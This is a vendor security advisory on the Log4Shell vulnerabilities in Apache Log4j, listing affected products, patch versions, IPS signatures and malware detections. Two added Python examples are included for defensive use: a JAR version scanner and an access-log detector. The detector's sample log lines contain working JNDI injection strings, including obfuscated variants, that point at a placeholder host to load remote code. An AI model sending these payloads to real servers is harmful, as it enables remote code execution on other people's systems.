Advisory: Log4j zero-day vulnerability AKA Log4Shell (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832)

Critical
CVE(s)
CVE-2021-44228
CVE-2021-45046
CVE-2021-45105
CVE-2021-44832
Updated:
Product(s)
Client Authentication Agent
Cloud Optix
Intercept X Endpoint
Intercept X for Server
Reflexion
SafeGuard Enterprise (SGN)
SG UTM
SG UTM Manager
Sophos Authenticator
Sophos Central
Sophos Connect Client 2.0
Sophos Email
Sophos Email Appliance (SEA)
Sophos Enterprise Console (SEC)
Sophos Firewall
Sophos Home
Sophos Mobile
Sophos Mobile EAS Proxy
Sophos RED
Sophos SSL VPN client
Sophos Transparent Authentication Suite (STAS)
Sophos Web Appliance (SWA)
Sophos Wireless
Sophos ZTNA
SophosLabs Intelix
Publication ID: sophos-sa-20211210-log4j-rce
Article Version: 27
First Published:
Workaround: No

Overview

On Thursday, December 9, 2021, a severe remote code execution vulnerability was revealed in Apache's Log4j, a very common logging library used by developers of web and server applications based on Java and other programming languages. The vulnerability affects a broad range of services and applications on servers, which makes it extremely dangerous and makes the latest updates for those server applications urgent. Sophos has observed widespread malicious attempts to exploit internet-facing services using this vulnerability.

The vulnerability makes it possible for any attacker who can inject text into log messages or log message parameters to make the server load code from a remote server; the targeted server then executes that code via calls to the Java Naming and Directory Interface (JNDI). JNDI interfaces with a number of network services, including the Lightweight Directory Access Protocol (LDAP), the Domain Name System (DNS), Java Remote Method Invocation (RMI), and the Common Object Request Broker Architecture (CORBA). Sophos has seen efforts to exploit LDAP, DNS and RMI, using a URL for one of those services that redirects to an external server.

Patches for Log4j

While there are steps customers can take to mitigate the vulnerability, the best fix is to upgrade to the patched version, which Apache has already released as Log4j 2.15.0.

Additional Log4j bugs, CVE-2021-45046 and CVE-2021-45105, have caused Apache to update Log4j from 2.15.0 to version 2.17.0. A fourth CVE, CVE-2021-44832, was reported just after the Christmas 2021 weekend, on 2021-12-28, causing Apache to update Log4j to version 2.17.1. Sophos recommends you update to Log4j 2.17.1.

If you have already started patching with version 2.15.0 but haven't completed the update on all systems, our recommendation is to finish patching the remaining systems with 2.17.1. This ensures that every system runs at least 2.15.0, which addresses the critical CVE-2021-44228 vulnerability; you can then go back and upgrade the 2.15.0 systems to 2.17.1 so that you have the same version everywhere.
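As an added example that is not part of this advisory or of Sophos tooling, the following Python script locates log4j-core JARs in a directory tree, reads the version each JAR declares in its own pom.properties, and reports any below the 2.17.1 release recommended above, noting whether the JndiLookup class is present. The maven path and class name are those of the upstream log4j-core artifact; the sample JARs the script builds are constructed for the demonstration.

```python
"""Find log4j-core JARs below the release this advisory recommends. Added example, not Sophos tooling."""
import os
import tempfile
import zipfile

RECOMMENDED = (2, 17, 1)  # the version Sophos recommends in this advisory
POM_PATH = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def parse_version(pom_text):
    """Turn the 'version=' line of pom.properties into a comparable tuple, e.g. (2, 15, 0)."""
    for line in pom_text.splitlines():
        if line.startswith("version="):
            nums = [int(p) for p in line.split("=", 1)[1].strip().split(".")[:3] if p.isdigit()]
            return tuple(nums + [0] * (3 - len(nums)))

def inspect_jar(path):
    """Return (version, has_jndi_lookup) for a log4j-core JAR, or None for any other archive."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        if POM_PATH not in names:
            return None
        return parse_version(zf.read(POM_PATH).decode("utf-8", "replace")), JNDI_CLASS in names

def scan(root):
    """Walk root; return (path, version, has_jndi_lookup) for each log4j-core JAR below RECOMMENDED."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not (name.lower().endswith((".jar", ".war", ".ear")) and zipfile.is_zipfile(path)):
                continue  # skip non-archives instead of aborting the whole scan on one bad file
            info = inspect_jar(path)
            if info and info[0] and info[0] < RECOMMENDED:
                findings.append((path, info[0], info[1]))
    return findings

def build_sample_tree():
    root = tempfile.mkdtemp()  # constructed sample data: minimal JARs, not real Log4j builds
    for rel, version, jndi in [("old/log4j-core-2.14.1.jar", "2.14.1", True),
                               ("new/log4j-core-2.17.1.jar", "2.17.1", True),
                               ("other/commons-lang3.jar", None, False)]:
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with zipfile.ZipFile(full, "w") as zf:
            if version:
                zf.writestr(POM_PATH, f"version={version}\n")
            if jndi:
                zf.writestr(JNDI_CLASS, b"")
    return root
```

Nested archives (a JAR inside a WAR) are not opened here; unpack them first or extend inspect_jar to recurse.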

What Sophos products are affected?

Sophos is reviewing and patching all affected applications and services as part of its incident response process.

| Product or Service | Status | Description |
| --- | --- | --- |
| Cloud Optix | Patched | Users may have noticed a brief outage on Friday, December 10, 2021 around 12:30 PM UTC as updates were deployed. Sophos performed host forensics and log analysis in the Cloud Optix environment and determined that the vulnerability was not successfully exploited prior to fixes being deployed. |
| PureMessage | Not vulnerable | PMX does not use Log4j. |
| Reflexion | Not impacted | Reflexion does not run an exploitable configuration. |
| SafeGuard Enterprise (SGN) | Not vulnerable | SGN does not use Log4j. |
| SG UTM (all versions) | Not vulnerable | SG UTM does not use Log4j. |
| SG UTM Manager (SUM) (all versions) | Not vulnerable | SUM does not use Log4j. |
| Sophos Authenticator | Not vulnerable | Sophos Authenticator does not use Log4j. |
| Sophos Central | Not impacted | Sophos Central does not run an exploitable configuration. |
| Sophos Endpoint protection (Windows/Mac/Linux) | Not vulnerable | Sophos Endpoint protection (Intercept X Endpoint, Intercept X for Server) does not use Log4j. |
| Sophos Email | Patched | Sophos performed host forensics and log analysis in the Sophos Email environment and determined that the vulnerability was not successfully exploited prior to fixes being deployed. |
| Sophos Email Appliance (SEA) | Not vulnerable | SEA does not use Log4j. |
| Sophos Enterprise Console (SEC) | Not vulnerable | SEC does not use Log4j. |
| Sophos Firewall (all versions) | Not vulnerable | Sophos Firewall does not use Log4j. |
| Sophos Firewall auxiliary clients | Not vulnerable | None of the Sophos Firewall auxiliary clients use Log4j: Sophos Connect Client, Sophos SSL VPN client, Sophos Transparent Authentication Suite (STAS), Sophos Authentication for Thin Client (SATC) (EOL), Client Authentication Agent (all versions). |
| Sophos Home | Not vulnerable | Sophos Home does not use Log4j. |
| Sophos Mobile | Not impacted | Sophos Mobile (in Central, SaaS, and on-premises) does not run an exploitable configuration. |
| Sophos Mobile EAS Proxy | Impacted | The Sophos Mobile Standalone EAS Proxy was affected by CVE-2021-44228 and the fix was included in version 9.7.2, which was released on Monday, December 13, 2021. The fix is also available in version 9.7.3 and all subsequent releases. Customers can download the latest version of the Standalone EAS Proxy Installer from the Sophos website. |
| Sophos RED | Not vulnerable | RED does not use Log4j. |
| Sophos Web Appliance (SWA) | Not vulnerable | SWA does not use Log4j. |
| Sophos Wireless | Not vulnerable | Sophos Wireless access points do not use Log4j. |
| Sophos ZTNA | Not vulnerable | Sophos ZTNA does not use Log4j. |
| SophosLabs Intelix | Not vulnerable | SophosLabs Intelix does not use Log4j. |


Other products and services

Any other products or services not listed above are still under investigation. Sophos will publish updated information as it becomes available.

How are Sophos customers protected?

Sophos Managed Threat Response (MTR) customers

Sophos is actively monitoring MTR customer accounts for post-exploit activity.

IPS Signatures

IPS signatures were published on December 11, 2021.

Sophos Firewall

  • SIDs are 2306426, 2306427, 2306428, 58722, 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58734, 58735, 58736, 58737, 58738, 58739, 58740, 58741, 58742, 58743, 58744, 58751, 58784, 58785, 58786, 58787, 58788, 58789, 58790, 58795, 58801, 58802, 58803, 58804, 58805, 58806, 58807, 58808, 58809, 58810, 58811, 58812, 58813, 2306526

Sophos Endpoint

  • SIDs are 2306426, 2306427, 2306428, 2306438, 2306439, 2306440, 2306441, 2306490, 2306493, 2306494, 2306495, 2306496, 2306497, 2306499, 2306526, 2306569, 2306570, 2306571, 2306572, 2306573, 2306574

Sophos SG UTM

  • SIDs are 58722, 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58734, 58735, 58736, 58737, 58738, 58739, 58740, 58741, 58742, 58743, 58744, 58751, 58784, 58785, 58786, 58787, 58788, 58789, 58790, 58795, 58801, 58802, 58803, 58804, 58805, 58806, 58807, 58808, 58809, 58810, 58811, 58812, 58813

Sophos XDR customers

Sophos XDR customers can use Sophos LiveQuery to help identify vulnerable Log4j components in their environment.

Example queries are maintained on the Sophos Community forum.

If you identify the vulnerable component, you should update immediately and review your logs for any signs of exploitation attempts. Sophos expects that successful exploitation will not be logged by Log4j itself, so correlation with other log sources is required.
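As an added example of the log review called for above, and not code from this advisory or from Sophos, the following Python script evaluates Log4j's own lookup syntax in web-server access-log lines (percent-decoding and collapsing nested lookups, as Log4j itself would before reaching the JNDI one), then extracts the scheme and host each JNDI lookup points at so they can be correlated with DNS and firewall logs. The log lines and the lookup.example.net host are constructed for the demonstration.

```python
"""Flag access-log lines carrying a Log4j JNDI lookup and extract where it points.
Added example, not Sophos tooling; the log lines below are constructed."""
import re
from urllib.parse import unquote

# Log4j evaluates these lookups before the JNDI one, so a detector has to evaluate them too;
# otherwise a lookup split across '${...}' pieces never contains the literal string 'jndi'.
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")    # ${name:key:-default} -> default
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}")   # ${lower:X} -> x, ${upper:x} -> X
JNDI_URL = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nis|nds)://([^/:}\s]+)", re.I)

def normalize(text):
    """Percent-decode (twice, for double-encoded requests) and collapse inner lookups until stable."""
    text = unquote(unquote(text))
    while True:
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        new = CASE_LOOKUP.sub(lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(), new)
        if new == text:
            return text
        text = new

def find_jndi_lookups(line):
    """Return [(scheme, host)] for every JNDI lookup in one log line, after normalization."""
    return [(scheme.lower(), host) for scheme, host in JNDI_URL.findall(normalize(line))]

def scan_log(lines):
    """Return (line_number, scheme, host) per hit; the hosts are what to look for in DNS and firewall logs."""
    return [(n, scheme, host) for n, line in enumerate(lines, 1) for scheme, host in find_jndi_lookups(line)]

SAMPLE_LOG = [  # constructed Apache combined-format lines; hosts are RFC 2606 documentation names
    '203.0.113.5 - - [10/Dec/2021:12:31:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:31:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup.example.net:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:31:12 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2Flookup.example.net%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.7 - - [10/Dec/2021:12:31:20 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}ndi:dns://lookup.example.net/c}"',
]
```

A hit in an access log shows only an attempt; as the paragraph above notes, whether the lookup succeeded has to be confirmed from outbound DNS, LDAP or RMI connections to the extracted host in other log sources.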

Malicious Payload Detections

SophosLabs has published detections for the malicious payloads arriving via Log4Shell. The detections are predominantly for cryptominers, attack scripts and malicious Java downloaders. Please note that not all of these payloads are exclusive to Log4Shell and may be arriving via another vector.

  • Troj/JavaDl-AAN

  • Troj/Java-AIN

  • Troj/Java-AIP

  • Troj/JavaDI-AAO

  • Troj/BatDl-GR

  • Troj/Ransom-GME

  • Troj/StealthL-A

  • Troj/Bckdr-RYB

  • Troj/Khonsari-A

  • Troj/PSDl-LR

  • Mal/JavaKC-B

  • XMRig Miner (PUA)

  • Mal/ShellDl-A

  • Mal/ExpJava-AL

  • Mal/ExpJava-AN

  • Mal/ExpJava-AO

  • Mal/ExpJava-AQ

  • App/StlthLdr-A

  • Linux/DDoS-DT

  • Linux/DDoS-DS

  • Linux/Miner-ABU

  • Linux/Miner-ADG

  • Linux/Miner-ADH

  • Linux/Miner-ZS

  • Linux/Miner-WU

  • Linux/Rootkt-M

  • Linux/Swrort-G

  • Linux/Miner-EQ

  • Linux/DDoS-CI

  • Linux/DDoS-CIA


Related Information